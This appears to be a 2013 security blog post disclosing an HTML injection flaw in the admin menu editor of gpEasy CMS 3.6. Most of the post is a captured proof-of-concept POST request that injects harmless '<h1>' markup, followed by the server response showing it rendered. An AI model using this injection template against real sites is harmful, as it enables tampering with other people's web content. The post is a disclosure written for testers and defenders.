Monday, 29 April 2013

gpEasy 3.6 HTML Injection

Hi all :)

Last year I wrote about HTML injection possibility in gpEasy 2.3.3.

Durning tests, few days ago I found the same vulnerability in latest version of this nice CMS.
Below a little example (and traffic from Burp Suite) to let you know, where exactly you can find it at your own server.

It's good to mention that this vulnerability exists only if admin user is logged-in. Anyway, check it out:

Request:
------------------------------
POST //gpEasy_3.6/index.php/Admin_Menu?menu=gpmenu&&menus[ExtraEditArea2]=Menu&menuh[ExtraEditArea2]=&menuc[ExtraEditArea2]=&menus[ExtraEditArea4]=TopTwoMenu&menuh[ExtraEditArea4]=<h1>aaaaaaaaaaa</h1>&menuc[ExtraEditArea4]=&menus[ExtraEditArea7]=MiddleSubMenu&menuh[ExtraEditArea7]=&menuc[ExtraEditArea7]=&gpreq=json&jsoncallback=jQuery18309982016143655706_1366988534821 HTTP/1.1
Host: 1.2.3.4
(...)
Referer: http://1.2.3.4/gpEasy_3.6/index.php/Admin_Menu
(...)
Connection: close
Pragma: no-cache
Cache-Control: no-cache

old_title=Home&title=Home&new_label=Home&keywords=&description=&cmd=renameit&verified=e23dca833a&verified=e23dca833a&verified=e23dca833a&=Save%20Changes
------------------------------

and response now should be similar to this one:
------------------------------
(...)

,CONTENT:"<ul class=\"menu_top\"><li class=\"li_0 li_title_a\"><h1>aaaaaaaaaaa</h1></li><li class=\"li_1 li_title_b\"><h1>aaaaaaaaaaa</h1><ul><li class=\"li_0 li_title_c\"><h1>aaaaaaaaaaa</h1></li></ul></li><li class=\"li_2 li_title_d\"><h1>aaaaaaaaaaa</h1><ul><li class=\"li_0 li_title_special_contact\"><h1>aaaaaaaaaaa</h1></li></ul></li></ul>"},{DO:"replacemenu",SELECTOR:"#ExtraEditArea7",CONTENT:"<div class=\"emtpy_menu\"></div>"},{DO:"inner",SELE

(...)
------------------------------

How to find this kind of vulnerabilities you can find here (old article in Polish), here , here and here too. :)

Enjoy and remember to use it only in legal projects. ;)

Cheers o/

No comments:

Post a Comment

What do You think...?